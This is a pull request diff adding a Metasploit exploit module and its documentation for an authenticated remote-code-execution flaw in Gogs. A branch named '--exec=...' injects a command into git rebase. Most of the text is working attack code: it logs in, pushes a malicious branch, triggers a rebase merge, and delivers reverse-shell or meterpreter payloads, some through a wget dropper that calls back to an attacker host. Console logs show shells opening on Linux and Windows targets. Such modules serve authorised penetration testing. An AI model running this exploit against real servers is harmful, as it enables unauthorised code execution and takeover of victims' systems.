### PR TITLE
Add Gogs rebase RCE exploit module

### DIFF
--- a/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
+++ b/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
@@ -25,6 +25,8 @@ Two exploitation methods are supported:
 corrupted git state (mid-rebase). For `own_repo` this is inconsequential because the
 repository is deleted during cleanup. For `existing_repo`, this can break the target
 repository for legitimate users and prevents re-exploitation against the same repo.
+To restore exploitability, delete the Gogs local copy cache on the server
+(e.g., `data/tmp/local-repo/<repo_id>`) — this requires post-exploitation access.
 
 The Gogs API does not support token deletion, so the API access token created during
 exploitation will persist under the attacker's account and must be removed manually.
@@ -169,12 +171,13 @@ msf6 exploit(multi/http/gogs_rebase_rce) > set ENABLE_REBASE false
 ENABLE_REBASE => false
 msf6 exploit(multi/http/gogs_rebase_rce) > check
 
-[+] Gogs 0.14.2 detected.
-[*] The target appears to be vulnerable.
+[+] 192.168.1.100:3000 - The target appears to be vulnerable. Gogs 0.14.2 detected.
 
 msf6 exploit(multi/http/gogs_rebase_rce) > run
 
 [*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Gogs 0.14.2 detected.
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Authenticating as "attacker"
 [+] Authenticated

--- a/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
+++ b/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
@@ -13,13 +13,12 @@ Two exploitation methods are supported:
 - **own_repo** (default): The attacker creates a temporary repository, enables rebase
   merge, and operates entirely within their own account. Any authenticated user who can
   create repositories (the default) can exploit this with no interaction from other users.
-  Supports all targets including CmdStager-based droppers. The repository is deleted
-  during cleanup.
+  The repository is deleted during cleanup.
 
 - **existing_repo**: The attacker exploits a repository they already have write and merge
   access to (e.g., as a collaborator), where "Rebase before merging" is enabled or the
   attacker has repo admin permissions to enable it. This path is useful on instances where
-  repository creation is restricted. Only command targets are supported (not droppers).
+  repository creation is restricted.
   Cleanup deletes the pushed branches and closes the pull request.
 
 **Important**: A successful rebase merge may leave the server-side repository in a
@@ -146,48 +145,6 @@ whoami
 git
 ```
 
-### Gogs 0.14.2 on Docker (Linux) — Linux Dropper target
-
-```
-msf6 > use exploit/multi/http/gogs_rebase_rce
-msf6 exploit(multi/http/gogs_rebase_rce) > set RHOSTS 192.168.1.100
-RHOSTS => 192.168.1.100
-msf6 exploit(multi/http/gogs_rebase_rce) > set RPORT 3000
-RPORT => 3000
-msf6 exploit(multi/http/gogs_rebase_rce) > set USERNAME attacker
-USERNAME => attacker
-msf6 exploit(multi/http/gogs_rebase_rce) > set PASSWORD Password123
-PASSWORD => Password123
-msf6 exploit(multi/http/gogs_rebase_rce) > set LHOST 172.17.0.1
-LHOST => 172.17.0.1
-msf6 exploit(multi/http/gogs_rebase_rce) > set TARGET 1
-TARGET => 1
-msf6 exploit(multi/http/gogs_rebase_rce) > run
-
-[*] Started reverse TCP handler on 172.17.0.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Gogs 0.14.2 detected.
-[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[*] Authenticating as "attacker"
-[+] Authenticated
-[*] Creating repository "wxyz-abcd"
-[+] Repository created
-[*] Enabling rebase merge in repository settings
-[+] Rebase merge enabled
-[*] Pushing base branches via git
-[+] Base branches pushed
-[*] Delivering payload via CmdStager
-[*] Creating pull request
-[+] PR #1 created
-[*] Triggering rebase merge
-[+] Rebase merge triggered
-[*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:43242)
-
-meterpreter > getuid
-Server username: git
-```
-
 ### Gogs 0.14.2 on Docker (Linux) — Existing Repository (collaborator with write access)
 
 ```
@@ -261,8 +218,8 @@ msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_OWNER attacker
 REPO_OWNER => attacker
 msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_NAME target-repo
 REPO_NAME => target-repo
-msf6 exploit(multi/http/gogs_rebase_rce) > set TARGET 2
-TARGET => 2
+msf6 exploit(multi/http/gogs_rebase_rce) > set TARGET 1
+TARGET => 1
 msf6 exploit(multi/http/gogs_rebase_rce) > check
 
 [+] 192.168.1.200:3000 - The target appears to be vulnerable. Gogs 0.14.2 detected.

--- a/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
+++ b/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
@@ -1,0 +1,299 @@
+## Vulnerable Application
+
+This module exploits an argument injection vulnerability in the pull request merge flow
+of [Gogs](https://github.com/gogs/gogs) (<= 0.14.2 and 0.15.0+dev).
+
+The `Merge()` function in `internal/database/pull.go` passes the PR base branch name to
+`git rebase` without a `--` separator. A branch named `--exec=<CMD>` is parsed by Git as
+the `--exec` flag rather than a positional argument, causing `sh -c <CMD>` to run after
+each replayed commit during the rebase.
+
+Two exploitation methods are supported:
+
+- **own_repo** (default): The attacker creates a temporary repository, enables rebase
+  merge, and operates entirely within their own account. Any authenticated user who can
+  create repositories (the default) can exploit this with no interaction from other users.
+  Supports all targets including CmdStager-based droppers. The repository is deleted
+  during cleanup.
+
+- **existing_repo**: The attacker exploits a repository they already have write and merge
+  access to (e.g., as a collaborator), where "Rebase before merging" is enabled or the
+  attacker has repo admin permissions to enable it. This path is useful on instances where
+  repository creation is restricted. Only command targets are supported (not droppers).
+  Cleanup deletes the pushed branches and closes the pull request.
+
+**Important**: A successful rebase merge may leave the server-side repository in a
+corrupted git state (mid-rebase). For `own_repo` this is inconsequential because the
+repository is deleted during cleanup. For `existing_repo`, this can break the target
+repository for legitimate users and prevents re-exploitation against the same repo.
+
+The Gogs API does not support token deletion, so the API access token created during
+exploitation will persist under the attacker's account and must be removed manually.
+
+A local `git` installation is required on the attacker machine.
+
+### Setup
+
+A dockerized Gogs 0.14.2 instance can be started with:
+
+```bash
+docker run -d --name gogs -p 3000:3000 gogs/gogs:0.14
+```
+
+1. Navigate to `http://localhost:3000/install` and complete the initial setup (SQLite3 is fine).
+2. Register a user account (e.g., `attacker` / `Password123`).
+3. For **existing_repo** testing: create a second user who owns a repository, add the
+   attacker as a collaborator with write access, and enable "Rebase before merging" in
+   the repository settings.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/gogs_rebase_rce`
+1. Do: `set RHOSTS <target>`
+1. Do: `set RPORT 3000`
+1. Do: `set USERNAME <gogs_user>`
+1. Do: `set PASSWORD <gogs_password>`
+1. Do: `set LHOST <your_ip>`
+1. Do: `check`
+1. You should see the Gogs version detected.
+1. Do: `run`
+1. You should get a shell as the Gogs process user (typically `git` in Docker).
+
+For the **existing_repo** path, additionally set:
+
+1. Do: `set EXPLOIT_METHOD existing_repo`
+1. Do: `set REPO_OWNER <owner_username>`
+1. Do: `set REPO_NAME <repo_name>`
+1. Do: `set ENABLE_REBASE false` (if rebase is already enabled on the repo)
+
+## Options
+
+### USERNAME
+
+The username of a valid Gogs account. For `own_repo`, any authenticated user who can
+create repositories is sufficient. For `existing_repo`, the user must have write and
+merge access to the target repository.
+
+### PASSWORD
+
+The password for the specified Gogs account.
+
+### EXPLOIT_METHOD
+
+The exploitation method to use. `own_repo` (default) creates a temporary repository.
+`existing_repo` targets a repository the attacker already has write access to.
+
+### REPO_OWNER
+
+Owner of the target repository. Required when `EXPLOIT_METHOD` is `existing_repo`.
+
+### REPO_NAME
+
+Name of the target repository. Required when `EXPLOIT_METHOD` is `existing_repo`.
+
+### ENABLE_REBASE
+
+When set to `true` (default), the module attempts to enable "Rebase before merging" in
+the repository settings. For `existing_repo`, this requires repo admin access; if the
+attacker only has write access, the module warns and continues (assuming rebase is
+already enabled). Set to `false` if rebase merge is already enabled on the target repo.
+
+## Scenarios
+
+### Gogs 0.14.2 on Docker (Linux) — Unix Command target
+
+```
+msf6 > use exploit/multi/http/gogs_rebase_rce
+msf6 exploit(multi/http/gogs_rebase_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(multi/http/gogs_rebase_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gogs_rebase_rce) > set USERNAME attacker
+USERNAME => attacker
+msf6 exploit(multi/http/gogs_rebase_rce) > set PASSWORD Password123
+PASSWORD => Password123
+msf6 exploit(multi/http/gogs_rebase_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(multi/http/gogs_rebase_rce) > check
+
+[+] 192.168.1.100:3000 - The target appears to be vulnerable. Gogs 0.14.2 detected.
+
+msf6 exploit(multi/http/gogs_rebase_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Gogs 0.14.2 detected.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Authenticating as "attacker"
+[+] Authenticated
+[*] Creating repository "abcd-efgh"
+[+] Repository created
+[*] Enabling rebase merge in repository settings
+[+] Rebase merge enabled
+[*] Pushing branches via git
+[+] Branches pushed
+[*] Creating pull request
+[+] PR #1 created
+[*] Triggering rebase merge
+[+] Rebase merge triggered, waiting for shell...
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:43240)
+[*] Cleaning up - deleting repository abcd-efgh
+[+] Repository abcd-efgh deleted
+[!] API token "msf_*" persists on the target (Gogs API does not support token deletion)
+
+whoami
+git
+```
+
+### Gogs 0.14.2 on Docker (Linux) — Linux Dropper target
+
+```
+msf6 > use exploit/multi/http/gogs_rebase_rce
+msf6 exploit(multi/http/gogs_rebase_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(multi/http/gogs_rebase_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gogs_rebase_rce) > set USERNAME attacker
+USERNAME => attacker
+msf6 exploit(multi/http/gogs_rebase_rce) > set PASSWORD Password123
+PASSWORD => Password123
+msf6 exploit(multi/http/gogs_rebase_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(multi/http/gogs_rebase_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/http/gogs_rebase_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Gogs 0.14.2 detected.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Authenticating as "attacker"
+[+] Authenticated
+[*] Creating repository "wxyz-abcd"
+[+] Repository created
+[*] Enabling rebase merge in repository settings
+[+] Rebase merge enabled
+[*] Pushing base branches via git
+[+] Base branches pushed
+[*] Delivering payload via CmdStager
+[*] Creating pull request
+[+] PR #1 created
+[*] Triggering rebase merge
+[+] Rebase merge triggered
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:43242)
+
+meterpreter > getuid
+Server username: git
+```
+
+### Gogs 0.14.2 on Docker (Linux) — Existing Repository (collaborator with write access)
+
+```
+msf6 > use exploit/multi/http/gogs_rebase_rce
+msf6 exploit(multi/http/gogs_rebase_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(multi/http/gogs_rebase_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gogs_rebase_rce) > set USERNAME attacker
+USERNAME => attacker
+msf6 exploit(multi/http/gogs_rebase_rce) > set PASSWORD Password123
+PASSWORD => Password123
+msf6 exploit(multi/http/gogs_rebase_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(multi/http/gogs_rebase_rce) > set EXPLOIT_METHOD existing_repo
+EXPLOIT_METHOD => existing_repo
+msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_OWNER repoowner
+REPO_OWNER => repoowner
+msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_NAME target-repo
+REPO_NAME => target-repo
+msf6 exploit(multi/http/gogs_rebase_rce) > set ENABLE_REBASE false
+ENABLE_REBASE => false
+msf6 exploit(multi/http/gogs_rebase_rce) > check
+
+[+] Gogs 0.14.2 detected.
+[*] The target appears to be vulnerable.
+
+msf6 exploit(multi/http/gogs_rebase_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Authenticating as "attacker"
+[+] Authenticated
+[*] Using existing repository "repoowner/target-repo"
+[+] Repository repoowner/target-repo confirmed accessible
+[*] Assuming rebase merge is already enabled (set ENABLE_REBASE to change settings)
+[*] Pushing branches via git
+[+] Branches pushed
+[*] Creating pull request
+[+] PR #1 created
+[*] Triggering rebase merge
+[+] Rebase merge triggered, waiting for shell...
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:34468)
+[*] Cleaning up artifacts from repoowner/target-repo
+[+] Malicious branch deleted
+[+] Feature branch deleted
+[+] PR #1 closed
+[!] API token "msf_*" persists on the target (Gogs API does not support token deletion)
+
+whoami
+git
+```
+
+### Gogs 0.14.2 on Windows — Windows Command target (existing_repo)
+
+```
+msf6 > use exploit/multi/http/gogs_rebase_rce
+msf6 exploit(multi/http/gogs_rebase_rce) > set RHOSTS 192.168.1.200
+RHOSTS => 192.168.1.200
+msf6 exploit(multi/http/gogs_rebase_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gogs_rebase_rce) > set USERNAME attacker
+USERNAME => attacker
+msf6 exploit(multi/http/gogs_rebase_rce) > set PASSWORD Password123
+PASSWORD => Password123
+msf6 exploit(multi/http/gogs_rebase_rce) > set LHOST 192.168.1.100
+LHOST => 192.168.1.100
+msf6 exploit(multi/http/gogs_rebase_rce) > set EXPLOIT_METHOD existing_repo
+EXPLOIT_METHOD => existing_repo
+msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_OWNER attacker
+REPO_OWNER => attacker
+msf6 exploit(multi/http/gogs_rebase_rce) > set REPO_NAME target-repo
+REPO_NAME => target-repo
+msf6 exploit(multi/http/gogs_rebase_rce) > set TARGET 2
+TARGET => 2
+msf6 exploit(multi/http/gogs_rebase_rce) > check
+
+[+] 192.168.1.200:3000 - The target appears to be vulnerable. Gogs 0.14.2 detected.
+
+msf6 exploit(multi/http/gogs_rebase_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.100:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Gogs 0.14.2 detected.
+[*] Executing Windows Command for cmd/windows/reverse_powershell
+[*] Authenticating as "attacker"
+[+] Authenticated
+[*] Using existing repository "attacker/target-repo"
+[+] Repository attacker/target-repo confirmed accessible
+[*] Attempting to enable rebase merge in repository settings
+[+] Rebase merge enabled
+[*] Pushing branches via git
+[+] Branches pushed
+[*] Creating pull request
+[+] PR #1 created
+[*] Triggering rebase merge
+[+] Rebase merge triggered, waiting for shell...
+[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.200:49812)
+[*] Cleaning up artifacts from attacker/target-repo
+[+] Malicious branch deleted
+[+] Feature branch deleted
+[+] PR #1 closed
+[!] API token "msf_*" persists on the target (Gogs API does not support token deletion)
+
+Microsoft Windows [Version 10.0.26200.7840]
+
+C:\gogs\data\tmp\repos> whoami
+desktop-gogs\gogs
+```

--- a/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
+++ b/documentation/modules/exploits/multi/http/gogs_rebase_rce.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 This module exploits an argument injection vulnerability in the pull request merge flow
-of [Gogs](https://github.com/gogs/gogs) (<= 0.14.2 and 0.15.0+dev).
+of [Gogs](https://github.com/gogs/gogs) (<= 0.14.2 and <= 0.15.0+dev).
 
 The `Merge()` function in `internal/database/pull.go` passes the PR base branch name to
 `git rebase` without a `--` separator. A branch named `--exec=<CMD>` is parsed by Git as

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Gogs Git Rebase Argument Injection RCE',
         'Description' => %q{
           This module exploits an argument injection vulnerability in the
-          pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
+          pull request merge flow of Gogs (<= 0.14.2 and <= 0.15.0+dev).
 
           The Merge() function in internal/database/pull.go passes the PR
           base branch name to `git rebase` without a `--` separator. A
@@ -178,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
       host: rhost,
       port: rport,
       proto: 'tcp',
-      name: 'Gogs Git Service',
+      name: 'gogs',
       info: service_info,
       parents: {
         host: rhost,
@@ -276,7 +276,8 @@ class MetasploitModule < Msf::Exploit::Remote
         proto: 'tcp',
         name: name,
         info: "Exploited via #{datastore['EXPLOIT_METHOD']} method",
-        refs: references
+        refs: references,
+        service: report_gogs_service('Gogs Git Service')
       )
       print_good('Rebase merge triggered, waiting for shell...')
     end
@@ -624,11 +625,6 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     if @need_cleanup
-      begin
-        disconnect
-      rescue ::Rex::ConnectionError
-        nil
-      end
 
       if own_repo?
         cleanup_own_repo

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -1,0 +1,840 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Open3 is used to drive local git operations (clone, push, branch creation).
+# There is no Rex or MSF library for local git CLI interaction.
+require 'open3'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gogs Git Rebase Argument Injection RCE',
+        'Description' => %q{
+          This module exploits an argument injection vulnerability in the
+          pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
+
+          The Merge() function in internal/database/pull.go passes the PR
+          base branch name to `git rebase` without a `--` separator. A
+          branch named `--exec=<CMD>` is parsed by Git as the --exec flag
+          rather than a positional argument, causing `sh -c <CMD>` to run
+          after each replayed commit during the rebase.
+
+          Two exploitation methods are supported:
+
+          - own_repo: The attacker creates a temporary repository, enables
+          rebase merge, and operates entirely within their own account.
+          Any authenticated user who can create repositories (the default)
+          can exploit this with no interaction from other users required.
+          Supports all targets including CmdStager-based droppers.
+
+          - existing_repo: The attacker exploits a repository they already
+          have write and merge access to, where "Rebase before merging"
+          is enabled (or the attacker has repo admin permissions to
+          enable it). This path is useful on instances where repository
+          creation is restricted. Only command targets are supported
+          (not droppers) since CmdStager requires multiple merge cycles
+          which would be too noisy on a shared repository.
+
+          Both methods use git to push divergent branches (including the
+          malicious --exec= branch), open a pull request, and trigger a
+          rebase merge to execute the payload. A local git installation
+          is required.
+
+          The payload is delivered via a script file committed to the
+          repository, avoiding filesystem character restrictions on
+          Windows (NTFS) targets. Git for Windows uses MSYS2 sh for
+          --exec commands, enabling cross-platform exploitation of both
+          Linux and Windows Gogs instances.
+
+          Note: a successful rebase merge may leave the server-side
+          repository in a corrupted git state (mid-rebase). For
+          own_repo this is inconsequential because the repository is
+          deleted. For existing_repo this can break the target
+          repository and prevent re-exploitation against the same repo.
+
+          The Gogs API does not support token deletion, so the API
+          access token created during exploitation cannot be removed
+          automatically and will persist under the attacker account.
+        },
+        'Author' => [
+          'Crypto-Cat', # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          # ['CVE', ''],
+          ['GHSA', 'qf6p-p7ww-cwr9', 'gogs/gogs'],
+          ['URL', 'https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed'],
+          ['URL', 'https://github.com/gogs/gogs'],
+        ],
+        'DisclosureDate' => '2026-03-17',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => :wget
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/reverse_powershell'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 3000,
+          'WfsDelay' => 30
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          # Not REPEATABLE_SESSION: existing_repo can corrupt the target
+          # repo's git state (mid-rebase), preventing re-exploitation.
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Gogs username', nil]),
+      OptString.new('PASSWORD', [true, 'Gogs password', nil]),
+      OptEnum.new('EXPLOIT_METHOD', [
+        true, 'Exploit method: own_repo creates a temporary repo, existing_repo targets a repo the attacker has write access to',
+        'own_repo', ['own_repo', 'existing_repo']
+      ]),
+      OptString.new('REPO_OWNER', [false, 'Owner of the target repository (required for existing_repo)', nil]),
+      OptString.new('REPO_NAME', [false, 'Name of the target repository (required for existing_repo)', nil]),
+      OptBool.new('ENABLE_REBASE', [
+        true, 'Enable rebase merge in repository settings (existing_repo requires repo admin access)', true
+      ]),
+    ])
+
+    @need_cleanup = false
+  end
+
+  # Maps CSS/JS commit hashes to Gogs release versions for fingerprinting.
+  # The hash appears in the ?v= parameter of static asset URLs on unauthenticated pages.
+  COMMIT_TO_VERSION = {
+    '5dcb6c64bdf61e38dbdbb941c1d69789c560d0fb' => '0.14.2',
+    'f5c8030c1fd936f3e0e9f774e3c7c39fd102f56f' => '0.14.1',
+    '36c26c4ccc3ca0339db53eb1fa41e4e86b55163d' => '0.14.0',
+    'd958a47a0e9d8747e399c687fdb3ec64a3b1a736' => '0.13.4',
+    '5084b4a9b77a506f5e287e82e945e1c6882b827a' => '0.13.3',
+    '593c7b6db601c68d16b2fb9a7e1194cb816f5efb' => '0.13.2',
+    '0c40e600a275d490481cfeea53705810fbe94d9b' => '0.13.1',
+    '8c21874c00b6100d46b662f65baeb40647442f42' => '0.13.0',
+    'c9fba3cb30af0789fcf89098dfcb8f2286ee7d3b' => '0.12.11',
+    '1ce5171ae170750298c150874e718740dd7ef69f' => '0.12.10',
+    '012a1ba19ed2f8f5185be4254f655ba6c4b34db2' => '0.12.9',
+    '7f8799c01f264eb7770766621fb68debee414b68' => '0.12.8',
+    'd06ba7e527fcc462aecdb660ce001e87d94f024c' => '0.12.7',
+    '26395294bdef382b577fd60234e5bb14f4090cc8' => '0.12.6'
+  }.freeze
+
+  def own_repo?
+    datastore['EXPLOIT_METHOD'] == 'own_repo'
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    return CheckCode::Unknown('Target did not respond.') unless res
+
+    unless res.body.to_s.match(%r{<meta +name="author" +content="Gogs" */>})
+      return CheckCode::Safe('Target does not appear to be running Gogs.')
+    end
+
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'http',
+      info: 'Gogs Git Service'
+    )
+
+    # Fingerprint via static asset commit hash (unauthenticated, all versions)
+    hash_match = res.body.to_s.match(/gogs\.min\.css\?v=([a-f0-9]{40})/)
+    if hash_match
+      version = COMMIT_TO_VERSION[hash_match[1]]
+      if version
+        ver = Rex::Version.new(version)
+        if ver <= Rex::Version.new('0.14.2')
+          return CheckCode::Appears("Gogs #{version} detected.")
+        else
+          return CheckCode::Safe("Gogs #{version} detected.")
+        end
+      end
+      vprint_status("Unknown Gogs commit hash: #{hash_match[1]}")
+    end
+
+    CheckCode::Detected('Gogs detected, but could not determine version.')
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, 'Local git installation required but not found') unless git_available?
+
+    unless own_repo?
+      fail_with(Failure::BadConfig, 'REPO_OWNER is required when EXPLOIT_METHOD is existing_repo') if datastore['REPO_OWNER'].blank?
+      fail_with(Failure::BadConfig, 'REPO_NAME is required when EXPLOIT_METHOD is existing_repo') if datastore['REPO_NAME'].blank?
+
+      if %i[linux_dropper win_dropper].include?(target['Type'])
+        fail_with(Failure::BadConfig, 'Dropper targets require EXPLOIT_METHOD=own_repo (CmdStager needs multiple merge cycles on the repo)')
+      end
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    # Authenticate (API token first, before web login adds session cookies)
+    print_status("Authenticating as \"#{datastore['USERNAME']}\"")
+    create_api_token
+    gogs_login
+    print_good('Authenticated')
+
+    if own_repo?
+      @repo_name = "#{Rex::Text.rand_text_alpha_lower(4)}-#{Rex::Text.rand_text_alpha_lower(4)}"
+      @repo_path = "#{datastore['USERNAME']}/#{@repo_name}"
+      print_status("Creating repository \"#{@repo_name}\"")
+      create_repo
+      @need_cleanup = true
+      print_good('Repository created')
+
+      print_status('Enabling rebase merge in repository settings')
+      enable_rebase_merge
+      print_good('Rebase merge enabled')
+    else
+      @repo_name = datastore['REPO_NAME']
+      @repo_path = "#{datastore['REPO_OWNER']}/#{@repo_name}"
+      print_status("Using existing repository \"#{@repo_path}\"")
+      validate_existing_repo
+      @need_cleanup = true
+
+      if datastore['ENABLE_REBASE']
+        try_enable_rebase
+      else
+        print_status('Assuming rebase merge is already enabled (set ENABLE_REBASE to change settings)')
+      end
+    end
+
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      rand_name = Rex::Text.rand_text_alpha_lower(6)
+      @payload_content = payload.encoded
+      @payload_file = ".#{rand_name}"
+      @malicious_branch = "--exec=sh${IFS}#{@payload_file}"
+
+      if target['Type'] == :win_cmd
+        # MSYS2 sh mangles $, & etc. so write the payload to a .bat and
+        # have the sh wrapper invoke cmd.exe instead.
+        @bat_file = ".#{rand_name}.bat"
+      end
+
+      print_status('Pushing branches via git')
+      setup_branches_via_git
+      print_good('Branches pushed')
+
+      print_status('Creating pull request')
+      @pr_number = create_pull_request
+      print_good("PR ##{@pr_number} created")
+
+      print_status('Triggering rebase merge')
+      trigger_rebase_merge
+      report_vuln(
+        host: rhost,
+        port: rport,
+        proto: 'tcp',
+        name: name,
+        info: "Exploited via #{datastore['EXPLOIT_METHOD']} method",
+        refs: references
+      )
+      print_good('Rebase merge triggered, waiting for shell...')
+    when :win_dropper
+      # Commit the exe directly to the repo. CmdStager won't work here because
+      # the HTTP server shuts down before the rebase chain finishes fetching.
+      rand_name = Rex::Text.rand_text_alpha_lower(6)
+      @exe_file = ".#{rand_name}.exe"
+      @bat_file = ".#{rand_name}.bat"
+      @payload_file = ".#{rand_name}"
+      @payload_content = :win_dropper # sentinel for setup_branches_via_git
+      @malicious_branch = "--exec=sh${IFS}#{@payload_file}"
+
+      print_status('Pushing branches via git (with payload binary)')
+      setup_branches_via_git
+      print_good('Branches pushed')
+
+      print_status('Creating pull request')
+      @pr_number = create_pull_request
+      print_good("PR ##{@pr_number} created")
+
+      print_status('Triggering rebase merge')
+      trigger_rebase_merge
+      print_good('Rebase merge triggered, waiting for session...')
+    when :linux_dropper
+      print_status('Pushing base branches via git')
+      setup_branches_via_git(include_malicious: false)
+      print_good('Base branches pushed')
+
+      print_status('Delivering payload via CmdStager')
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    fail_with(Failure::BadConfig, 'CmdStager is not supported with EXPLOIT_METHOD=existing_repo') unless own_repo?
+
+    @exec_counter ||= 0
+    @exec_counter += 1
+
+    workdir = File.join(@tmpdir, 'work')
+
+    filename = ".#{Rex::Text.rand_text_alpha_lower(6)}"
+    File.write(File.join(workdir, filename), "(#{cmd}) </dev/null >/dev/null 2>&1 &\n")
+    run_git!(['add', filename], workdir)
+    @malicious_branch = "--exec=sh${IFS}#{filename}"
+
+    run_git!(['commit', '-m', "u#{@exec_counter}"], workdir)
+    run_git!(['push', 'origin', 'master'], workdir)
+
+    run_git!(['push', 'origin', "HEAD:refs/heads/#{@malicious_branch}"], workdir)
+    vprint_good("Malicious branch: #{@malicious_branch}")
+
+    print_status('Creating pull request')
+    @pr_number = create_pull_request
+    print_good("PR ##{@pr_number} created")
+
+    print_status('Triggering rebase merge')
+    trigger_rebase_merge
+    print_good('Rebase merge triggered')
+  end
+
+  # ---------------------------------------------------------------
+  # Authentication
+  # ---------------------------------------------------------------
+
+  def gogs_login
+    res = http_post_request(
+      '/user/login',
+      user_name: datastore['USERNAME'],
+      password: datastore['PASSWORD']
+    )
+    fail_with(Failure::Unreachable, 'Login page unreachable') unless res
+    fail_with(Failure::NoAccess, 'Login failed - check credentials') unless res.code == 302
+  end
+
+  def create_api_token
